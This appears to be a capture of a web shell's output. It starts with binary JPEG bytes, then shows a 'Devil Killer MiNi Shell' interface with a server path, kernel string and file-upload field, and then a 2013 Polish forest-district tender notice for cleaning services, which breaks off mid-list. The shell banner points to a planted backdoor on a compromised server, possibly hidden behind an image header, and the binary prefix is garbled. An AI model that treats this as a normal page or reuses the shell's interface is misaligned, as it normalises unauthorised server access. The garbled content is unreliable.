JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131202/495268-N-2013.html

<p class="kh_header"><b>Rogóźno: Przetarg nieograniczony - Sprzątanie pomieszczeń biurowo-mieszkalnych oraz prace gospodarcze na potrzeby Nadleśnictwa Jamy</b><br>
<b>Numer ogłoszenia: 495268 - 2013; data zamieszczenia: 02.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Jamy , Jamy 5, 86-318 Rogóźno, woj. kujawsko-pomorskie, tel. 056 4689732, faks 056 4689728.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> jamy.torun.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony - Sprzątanie pomieszczeń biurowo-mieszkalnych oraz prace gospodarcze na potrzeby Nadleśnictwa Jamy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest kompleksowe sprzątanie pomieszczeń w budynku biurowo-mieszkalnym, pomieszczenia socjalnego i domku letniskowego wraz z utrzymaniem czystości wokół siedziby nadleśnictwa oraz świadczeniem drobnych  usług gospodarczych w zależności od potrzeb dla Nadleśnictwa Jamy, wg poniższych części zamówienia:

Część zamówienia nr 1
Kompleksowe sprzątanie pomieszczeń w budynku biurowo-mieszkalnym, pomieszczenia socjalnego i domku letniskowego o łącznej powierzchni do sprzątania: 743,95 m2.

Szczegółowy wykaz pomieszczeń przeznaczonych do sprzątania:

I.	Budynek biurowo-mieszkalny Nadleśnictwa Jamy w m. Jamy 5, gm. Rogóźno

1. Piwnica
-	pomieszczenie nr 1 (magazyn)* 			- 23,80 m2
-	pomieszczenie nr 2 (archiwum)* 		-   9,30 m2
-	pomieszczenie nr 3 (archiwum)* 		- 23,70 m2
-	pomieszczenie nr 4 (archiwum)* 		- 19,50 m2
-	pomieszczenie nr 5 (archiwum)* 		- 17,90 m2
-	pomieszczenie nr 6 (archiwum)* 		- 15,00 m2
-	pomieszczenie nr 7 (pom. gosp.) 		- 11,00 m2
-	komunikacja 					- 31,60 m2
151,80 m2

2. Parter
-	pokój nr 1 (dz. techniczny) 			- 10,34 m2
-	pokój nr 2 (nadleśniczy) 				- 16,40 m2
-	pokój nr 2a (kancelaria)* 				-   7,62 m2
-	pokój nr 3 (sekretariat) 				- 18,50 m2
-	pokój nr 3a (serwerownia)*			-   4,35 m2
-	pokój nr 4 (księgowość) 				- 16,60 m2
-	pokój nr 5 (administracja 				- 14,70 m2
-	pokój nr 6 (administracja) 			- 13,30 m2
-	pokój nr 7 (gł. księgowy) 				- 12,50 m2
-	pokój nr 8 (księgowość) 				- 16,30 m2
-	pokój nr 9 (kasa) 					- 11,50 m2
-	pomieszczenia wc 				- 13,85 m2
-	komunikacja 					- 42,50 m2
-	wiatrołap 						- 12,30 m2
210,76 m2

3. I Piętro
-	pokój nr 10 (z-ca nadleśniczego)			- 17,05 m2
-	pokój nr 11 (dz. techniczny)			- 25,74 m2
-	pokój nr 12 (dz. techniczny)			- 13,40 m2
-	pokój nr 13 (dz. techniczny) 			-   7,90 m2
-	pokój nr 14 (straż leśna) 				- 17,01 m2
-	pokój nr 15 (świetlica) 				- 50,20 m2
-	pokój nr 16 (ksero) 				- 13,12 m2
-	pokój nr 17 (inż. nadzoru)			- 15,50 m2
-	magazynek straży leśnej *			-   2,12 m2
-	pomieszczenia wc 				- 14,40 m2
-	komunikacja 					- 29,30 m2
-	taras						- 11,16 m2
216,90 m2

4. Mieszkanie gościnne
-	pokój mały						- 14,70 m2
-	pokój mały						- 12,65 m2
-	aneks kuchenny					-   7,14 m2
-	łazienka						-   3,80 m2
-	komunikacja					-   9,30 m2
-	taras 						- 11,16 m2
   58,75 m2
II. Budynek warsztatu przy Nadleśnictwie Jamy w m. Jamy 5, gm. Rogóźno

1. Pomieszczenie socjalne
-	jadalnia z korytarzem	11,88 m2
-	szatnia 	7,48 m2	
-	łazienka i wc	9,94 m2
	    29,30 m2


III. Domek letniskowy nad j. Kuchnia w m. Szembruk, gm. Rogóźno

1. Pomieszczenia domku letniskowego
-	pokój duży (parter)	15,75 m2	
-	pokój mały (piętro)	15,30 m2
-	kuchnia 	2,16 m2	
-	łazienka z wc 	2,88 m2			
-	przedsionek 	1,53 m2			
-	pomieszczenie gospodarcze 	15,75 m2			
-	tarasy 	23,07m2
 	76,44 m2


Razem: 
I. Budynek biurowo-mieszkalny Nadleśnictwa Jamy	638,21 m2	 
II. Budynek warsztatu przy Nadleśnictwie Jamy 		  29,30 m2
III. Domek letniskowy nad j. Kuchnia 			  76,44 m2
								743,95 m2

Objaśnienia:
* W pomieszczeniach oznaczonych gwiazdką sprzątanie tylko na zlecenie i w obecności osoby odpowiedzialnej za te pomieszczenia.

Szczegółowy zakres zadań dot. części zamówienia nr 1:

I. Budynek biurowo-mieszkalny Nadleśnictwa Jamy w m. Jamy 5, gm. Rogóźno

1) Pomieszczenia biurowe i wc:
a)	Codziennie: 	- zamiatanie i mycie podłóg
- wycieranie kurzu z mebli biurowych, sprzętu biurowego, parapetów
- opróżnianie koszy na śmieci
- mycie, dezynfekcja umywalek i urządzeń sanitarnych
- wykładanie papieru toaletowego, ręczniczków papierowych i mydła we wszystkich
pomieszczeniach sanitarnych

b)	Raz  na  tydzień: 	- podlewanie i odkurzanie kwiatów - umycie płytek na ścianach w pomieszczeniach sanitarnych i wc

c)	Raz w miesiącu: 	-     pastowanie i polerowanie podłóg
-	dokładne starcie kurzu z szaf, wiszących lamp, obrazów i tablic
-	mycie okien, parapetów, drzwi, balustrad i krat w oknach
-	odkurzanie ścian, sufitów, gzymsów, grzejników i kratek wentylacyjnych z pajęczyn i kurzu

d)	Nie rzadziej niż raz na kwartał: 	- pranie firan

e) 	W okresie wiosenno-letnim
- posadzenie i pielęgnacja kwiatów na tarasie

f) 	Wg potrzeb
- przygotowanie naczyń i poczęstunku na narady, szkolenia, spotkania okolicznościowe
- sprzątanie i mycie naczyń po naradach, szkoleniach, spotkaniach okolicznościowych
- mycie naczyń po gościach u nadleśniczego i zastępcy nadleśniczego,

2) Pomieszczenia piwniczne (magazyn, archiwum)
a) 	Raz na kwartał:
- dokładne zamiecenie podłóg
- mycie okien, drzwi, krat i balustrad

3) Pomieszczenie gospodarcze w piwnicy
a)	Raz w tygodniu: 	- zamiatanie i mycie podłóg
- wycieranie kurzu z regałów półkowych
- opróżnianie koszy na śmieci
- mycie, dezynfekcja umywalek
- wykładanie ręczniczków papierowych i mydła

b)	Raz na kwartał: - mycie okien i drzwi

4) Mieszkanie gościnne
a) 	Wg potrzeb:
-	przygotowanie pościeli
-	zamiatanie i mycie podłóg
-     mycie, dezynfekcja umywalki i urządzeń sanitarnych
-	wycieranie kurzu z mebli, parapetów i obudowy kominka
-	mycie i dezynfekcja lodówki
-	mycie i dezynfekcja zlewozmywaka w kuchni
-	mycie maszynki elektrycznej do gotowania
-	mycie zmywarki
-	wykładanie papieru toaletowego w łazience
-	opróżnianie kosza na śmieci
-	utrzymanie czystości na klatce schodowej i na tarasie 

b)	Nie rzadziej niż raz na kwartał: 	-    pranie firan
	-    pastowanie i polerowanie podłóg
-	dokładne starcie kurzu z szaf, wiszących lamp, obrazów i półek
-	mycie okien, parapetów, drzwi i balustrad
-	odkurzanie ścian, sufitów, gzymsów, grzejników i kratek wentylacyjnych z pajęczyn i kurzu
-	wytrzepanie z kurzu chodnika dywanowego i koców
-	umycie płytek na ścianach w łazience



II. Budynek warsztatu przy Nadleśnictwie Jamy w m. Jamy 5, gm. Rogóźno

1) Pomieszczenie socjalne
a) 	Raz w tygodniu
-	zamiatanie i mycie podłóg
-    mycie, dezynfekcja umywalek i urządzeń sanitarnych
-	wycieranie kurzu z mebli i parapetów
-	wykładanie papieru toaletowego w łazience
-	opróżnianie kosza na śmieci

b)	Nie rzadziej niż raz na kwartał: -     dokładne starcie kurzu z szaf, wiszących lamp i półek
-	mycie okien, parapetów i drzwi
-	odkurzanie ścian, sufitów, gzymsów, grzejników i kratek wentylacyjnych z pajęczyn i kurzu
-	umycie płytek na ścianach w pomieszczeniach sanitarnych i wc


III. Domek letniskowy nad j. Kuchnia w m. Szembruk, gm. Rogóźno

1) Domek letniskowy nad j. Kuchnia
a)	Przed sezonem letnim 
-	zamiecenie i umycie podłóg
-	pastowanie i polerowanie podłóg
-	dokładne starcie kurzu z mebli, wiszących półek i lamp
-	wymycie szafek kuchennych wewnątrz i na zewnątrz
-	odkurzenie ścian i sufitów z pajęczyn i kurzu
-	umycie okien i drzwi
-	wypranie i powieszenie firanek
-	zamiecenie, zmycie podłóg i balustrad na tarasach
-	umycie i zdezynfekowanie umywalki, zlewozmywaka i urządzeń sanitarnych
-	wyłożenie papieru toaletowego, ręczniczków papierowych i mydła w pomieszczeniu wc
-	dokładne umycie i przygotowanie naczyń i garnków w kuchni
-	umycie i zdezynfekowanie lodówki
-	umycie maszynki elektrycznej do gotowania
-	odkurzenie tapczanów i materacy
-	wytrzepanie koców lub w razie potrzeby przekazanie ich do czyszczenia chem.
-	umycie i przygotowanie mebli ogrodowych
-	umycie i przygotowanie grilla ogrodowego

b)	Po sezonie letnim 
-    wszystkie czynności j. w. + zabezpieczenie wyposażenia przed zimą  

Część zamówienia nr 2
I. Utrzymanie czystości wokół siedziby Nadleśnictwa Jamy, pod pojęciem którego należy rozumieć teren/y (wg mapki poglądowej, która stanowi załącznik nr 1 do SIWZ):
-	d tylnej bramy wjazdowej (znajdującej się przy budynku warsztatowym nadleśnictwa) do rozwidlenia dróg (za osadą Nadleśniczego) - od strony szosy asfaltowej;
-	podwórza wokół budynku-biurowego nadleśnictwa i pozostałych budynków, w tym m.in. tereny zielone, park maszyn, myjnia płytowa;
-	od bramy wjazdowej do magazynu paliw;
-	teren zielony przed budynkiem mieszkalnym 6-rodzinnym w m.Jamy 16.

Szczegółowy zakres zadań dot. części zamówienia nr 2:

1. W okresie wiosennym i letnim
a)	Codziennie
-	usuwanie śmieci z zainstalowanych koszy
-	zbieranie porozrzucanych papierów i innych nieczystości, takich jak butelki, złom, gałęzie itp.
-	zamiatanie terenu przy wejściu do biura

b)	Wg potrzeb
-	utrzymanie terenów zieleni, w tym: koszenie i podlewanie traw
-	wykaszanie chwastów
-	cięcie żywopłotu, pielęgnacja drzewek i innych roślin ozdobnych

2. W okresie jesiennym i zimowym
a)	Codziennie
-	usuwanie śmieci z zainstalowanych koszy
-	zbieranie porozrzucanych papierów i innych nieczystości, takich jak butelki, złom, gałęzie itp.
-	zamiatanie terenu przy wejściu do biura

b)	Wg potrzeb
-    grabienie i usuwanie liści 
-	usuwanie śniegu i błota pośniegowego ze schodów oraz przyległego terenu przy wejściu do biurowca oraz na parkingu 
-	usuwanie zlodowaceń ze schodów oraz z przyległego do nich terenu poprzez posypywanie piaskiem i solą

II. Świadczenie drobnych  usług gospodarczych w zależności od potrzeb dla Nadleśnictwa Jamy:
-	za- i rozładunek materiałów do magazynu nadleśnictwa,
-	drobne naprawy w biurze nadleśnictwa i jego otoczeniu,
-	konserwacja i drobne naprawy sprzętu,
-	przenoszenie sprzętu biurowego i mebli w związku z ewentualnym remontem budynku,
-	prace porządkowe przy domku letniskowym nadleśnictwa nad j. Kuchnia w m. Szembruk, gm. Rogóźno 
(wg potrzeb: koszenie traw, wykaszanie chwastów, cięcie żywopłotu, zgrabienie i usunięcie liści oraz zebranie porozrzucanych papierów i innych nieczystości, takich jak butelki, złom, gałęzie itp.)
Przewidywana ilość godzin do przepracowania w okresie trwania umowy: 300h.

Zamawiający dopuszcza składanie ofert częściowych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.92.00-4, 90.91.00.00-9, 77.30.00.00-3, 90.62.00.00-9, 90.63.00.00-2, 98.39.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:
a)	posiada polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - na kwotę nie mniejszą niż:
20 000,00zł netto - dla całości przedmiotu zamówienia,
w przypadku składania ofert częściowych:
10 000,00zł netto - dla części zamówienia nr 1,
10 000,00zł netto - dla części zamówienia nr 2,

Wykonawca, który z uzasadnionej przyczyny nie może przedstawić dokumentu wymienionego w niniejszym pkt., a dotyczącego sytuacji finansowej i ekonomicznej, może przedstawić inny dokument, który w sposób wystarczający potwierdzać będą spełnienie tego warunku.

W przypadku, gdy Wykonawca dla potwierdzenia spełniania warunku dotyczącego sytuacji ekonomicznej i finansowej przedstawi dokument zawierający kwoty wyrażone w walutach innych niż złoty polski, Zamawiający przeliczy je na PLN. Do przeliczenia zostanie zastosowany wyliczony i ogłoszony przez Narodowy Bank Polski bieżący kurs średni wymiany na dzień wystawienia dokumentu potwierdzającego spełnianie warunku.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z warunków określonych w pkt. 2.1 winien spełniać, co najmniej jeden z tych wykonawców albo wszyscy ci wykonawcy wspólnie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w stosunku do treści oferty, 
na podstawie której dokonano wyboru Wykonawcy.
Zmiany, o których mowa w niniejszym pkt. mogą zostać dokonane, jeżeli ich uzasadnieniem są niżej wymienione okoliczności:

1)Zmiana osób realizujących przedmiot umowy, wskazanych w ofercie Wykonawcy, 
może być dokonana w sytuacji:
a)na żądanie Zamawiającego w przypadku nienależytego wykonania powierzonych prac;
b)na wniosek Wykonawcy w przypadku:
-śmierci, choroby lub innego zdarzenia losowego,
-nienależytego wykonywania powierzonych prac,
-innych obiektywnych okoliczności niezależnych od Wykonawcy 
(np. rezygnacji).
Uwaga: w przypadku zmiany osób, Wykonawca musi przedstawić kandydaturę innej osoby i uzyskać zgodę Zamawiającego. Zamawiający nie żąda wskazania takich osób.

2)Zmiana podwykonawców może być dokonana w sytuacji:
a)na żądanie Zamawiającego w przypadku nienależytego wykonania powierzonych prac;
b)na wniosek Wykonawcy w przypadku:
-nienależytego wykonywania powierzonych prac,
-innych obiektywnych okoliczności niezależnych od Wykonawcy 
(np. rezygnacji).

3)Zmiana podatku VAT będzie możliwa w przypadku gdy nastąpi zmiana obowiązujących w tym względzie przepisów prawa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> jamy.torun.lasy.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Jamy, Jamy 5, 86-318 Rogóźno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2013 godzina 08:00, miejsce: Nadleśnictwo Jamy, Jamy 5, 86-318 Rogóźno
sekretariat-pokój nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kompleksowe sprzątanie pomieszczeń w budynku biurowo-mieszkalnym, pomieszczenia socjalnego i domku letniskowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kompleksowe sprzątanie pomieszczeń w budynku biurowo-mieszkalnym, pomieszczenia socjalnego i domku letniskowego o łącznej powierzchni do sprzątania: 743,95 m2.

Szczegółowy wykaz pomieszczeń przeznaczonych do sprzątania:

I.	Budynek biurowo-mieszkalny Nadleśnictwa Jamy w m. Jamy 5, gm. Rogóźno

1. Piwnica
-	pomieszczenie nr 1 (magazyn)* 			- 23,80 m2
-	pomieszczenie nr 2 (archiwum)* 		-   9,30 m2
-	pomieszczenie nr 3 (archiwum)* 		- 23,70 m2
-	pomieszczenie nr 4 (archiwum)* 		- 19,50 m2
-	pomieszczenie nr 5 (archiwum)* 		- 17,90 m2
